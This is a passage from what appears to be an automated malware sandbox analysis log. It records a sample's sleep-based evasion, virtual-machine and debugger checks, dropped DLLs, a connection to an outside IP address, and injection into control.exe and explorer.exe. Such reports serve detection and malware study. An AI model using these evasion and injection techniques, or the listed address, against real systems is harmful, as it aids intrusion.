            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392 | Thread sleep time: -1773297476s >= -30000s
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392 | Thread sleep count: 1682 > 30
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392 | Thread sleep count: 2348 > 30
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392 | Thread sleep count: 818 > 30
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392 | Thread sleep time: -157056s >= -30000s
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392 | Thread sleep count: 698 > 30
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392 | Thread sleep time: -268032s >= -30000s
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392 | Thread sleep count: 853 > 30
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392 | Thread sleep time: -81888s >= -30000s
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392 | Thread sleep count: 446 > 30
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392 | Thread sleep count: 2353 > 30
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392 | Thread sleep time: -56472s >= -30000s
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392 | Thread sleep count: 784 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6440 | Thread sleep count: 3777 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5496 | Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6452 | Thread sleep count: 161 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5496 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6448 | Thread sleep count: 2449 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1348 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6752 | Thread sleep count: 84 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4104 | Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4104 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4972 | Thread sleep count: 5209 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4964 | Thread sleep count: 1051 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5552 | Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5552 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\rundll32.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
            Source: C:\Windows\System32\loaddll32.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
            Source: C:\Windows\SysWOW64\regsvr32.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
            Source: C:\Windows\System32\loaddll32.exe | Last function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pqvogmwc.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ugg3o5nf.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0hsihch1.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sjfy431f.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pwlcj2cu.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\oyq1c2cj.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tpt0a0ul.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\oeprcmty.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\regsvr32.exe | Window / User API: threadDelayed 1682
            Source: C:\Windows\SysWOW64\regsvr32.exe | Window / User API: threadDelayed 2348
            Source: C:\Windows\SysWOW64\regsvr32.exe | Window / User API: threadDelayed 818
            Source: C:\Windows\SysWOW64\regsvr32.exe | Window / User API: threadDelayed 698
            Source: C:\Windows\SysWOW64\regsvr32.exe | Window / User API: threadDelayed 853
            Source: C:\Windows\SysWOW64\regsvr32.exe | Window / User API: threadDelayed 446
            Source: C:\Windows\SysWOW64\regsvr32.exe | Window / User API: threadDelayed 2353
            Source: C:\Windows\SysWOW64\regsvr32.exe | Window / User API: threadDelayed 784
            Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 386
            Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 467
            Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 878
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3777
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2449
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3669
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5209
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1051
            Source: C:\Windows\SysWOW64\rundll32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\SysWOW64\regsvr32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\SysWOW64\rundll32.exe | API coverage: 5.7 %
            Source: C:\Windows\System32\loaddll32.exe | Process information queried: ProcessInformation
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_046CB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_046CB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_046DD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_04BCB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_04BCB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_04BDD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_05EAB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_05EBD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_05EAB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0511B190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0512D39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0511B2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError
            Source: C:\Windows\System32\loaddll32.exe | Thread delayed: delay time: 120000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_046DFD82 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree
            Source: explorer.exe, 0000002F.00000000.488090790.000000000871C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000002F.00000000.496756398.0000000008778000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
            Source: explorer.exe, 0000002F.00000000.504963092.00000000067C2000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000002F.00000000.488090790.000000000871C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
            Source: rundll32.exe, 00000005.00000003.356861693.0000000003380000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.495341507.000000000337C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.370066719.0000000003382000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.494533475.000000000337C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.496800604.000000000337F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.359830510.0000000003380000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.498298788.0000000003380000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.358348203.0000000003380000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWntVersion\Internet Settings~~
            Source: explorer.exe, 0000002F.00000000.504963092.00000000067C2000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
            Source: loaddll32.exe, 00000001.00000003.492686676.0000000001342000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.508275635.0000000001347000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.370406857.0000000001332000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.493122796.0000000001310000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000002.511408070.0000000001343000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.489086905.000000000133A000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.488421383.0000000001331000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.493342130.0000000001346000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.369970075.0000000003382000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.499946286.000000000337C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: regsvr32.exe, 00000003.00000003.500987131.0000000003362000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.378321458.0000000003347000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW(^8
            Source: explorer.exe, 0000002F.00000000.488090790.000000000871C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046D653E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,1_2_046D653E
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00DC0CE8 mov eax, dword ptr fs:[00000030h]1_2_00DC0CE8
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00DC0C57 mov eax, dword ptr fs:[00000030h]1_2_00DC0C57
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00DC0A64 mov eax, dword ptr fs:[00000030h]1_2_00DC0A64
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00DC0BFC mov eax, dword ptr fs:[00000030h]1_2_00DC0BFC
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00DC0B14 mov eax, dword ptr fs:[00000030h]1_2_00DC0B14
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01120C57 mov eax, dword ptr fs:[00000030h]4_2_01120C57
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01120B14 mov eax, dword ptr fs:[00000030h]4_2_01120B14
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01120BFC mov eax, dword ptr fs:[00000030h]4_2_01120BFC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01120A64 mov eax, dword ptr fs:[00000030h]4_2_01120A64
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01120CE8 mov eax, dword ptr fs:[00000030h]4_2_01120CE8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00EB0CE8 mov eax, dword ptr fs:[00000030h]5_2_00EB0CE8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00EB0A64 mov eax, dword ptr fs:[00000030h]5_2_00EB0A64
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00EB0C57 mov eax, dword ptr fs:[00000030h]5_2_00EB0C57
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00EB0BFC mov eax, dword ptr fs:[00000030h]5_2_00EB0BFC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00EB0B14 mov eax, dword ptr fs:[00000030h]5_2_00EB0B14
            Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046C8C50 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,1_2_046C8C50
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BC8C50 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,3_2_04BC8C50
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EA8C50 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,4_2_05EA8C50
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05118C50 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,5_2_05118C50

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 194.76.226.200 80
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\System32\control.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\System32\control.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\System32\loaddll32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0
            Source: C:\Windows\System32\loaddll32.exe | Memory written: C:\Windows\System32\control.exe base: 220000
            Source: C:\Windows\System32\loaddll32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\System32\control.exe base: CE0000
            Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0
            Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0
            Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0
            Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0
            Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 956000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 2D60000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 954000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 2B60000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 940000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 2B50000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 942000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 2AC0000
            Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 93E000
            Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
            Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 2BA0000
            Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 93C000
            Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
            Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: D70000
            Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
            Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
            Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
            Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
            Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
            Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute read
            Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
            Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exe | Memory protected: unknown base: 7FFC8DCB1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exe | Memory protected: unknown base: 7FFC8DCB1580 protect: page execute read
            Source: C:\Windows\System32\loaddll32.exe | Memory allocated: C:\Windows\System32\control.exe base: 220000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: C:\Windows\System32\control.exe base: CE0000 protect: page execute and read and write
            Source: C:\Windows\System32\control.exe | Memory allocated: C:\Windows\explorer.exe base: 2BA0000 protect: page execute and read and write
            Source: C:\Windows\System32\control.exe | Memory allocated: C:\Windows\explorer.exe base: D70000 protect: page execute and read and write
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3352 base: 956000 value: 00
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3352 base: 2D60000 value: 80
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3352 base: 954000 value: 00
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3352 base: 2B60000 value: 80
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3352 base: 940000 value: 00
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3352 base: 2B50000 value: 80
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3352 base: 942000 value: 00
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3352 base: 2AC0000 value: 80
            Source: C:\Windows\System32\control.exe | Memory written: PID: 3352 base: 93E000 value: 00
            Source: C:\Windows\System32\control.exe | Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
            Source: C:\Windows\System32\control.exe | Memory written: PID: 3352 base: 2BA0000 value: 80
            Source: C:\Windows\System32\control.exe | Memory written: PID: 3352 base: 93C000 value: 00
            Source: C:\Windows\System32\control.exe | Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
            Source: C:\Windows\System32\control.exe | Memory written: PID: 3352 base: D70000 value: 80
            Source: C:\Windows\System32\control.exe | Memory written: PID: 3352 base: 7FFC8DCB1580 value: 40
            Source: C:\Windows\System32\loaddll32.exe | Thread register set: target process: 3360
            Source: C:\Windows\SysWOW64\regsvr32.exe | Thread register set: target process: 3088
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 3352
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 3352
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 3352
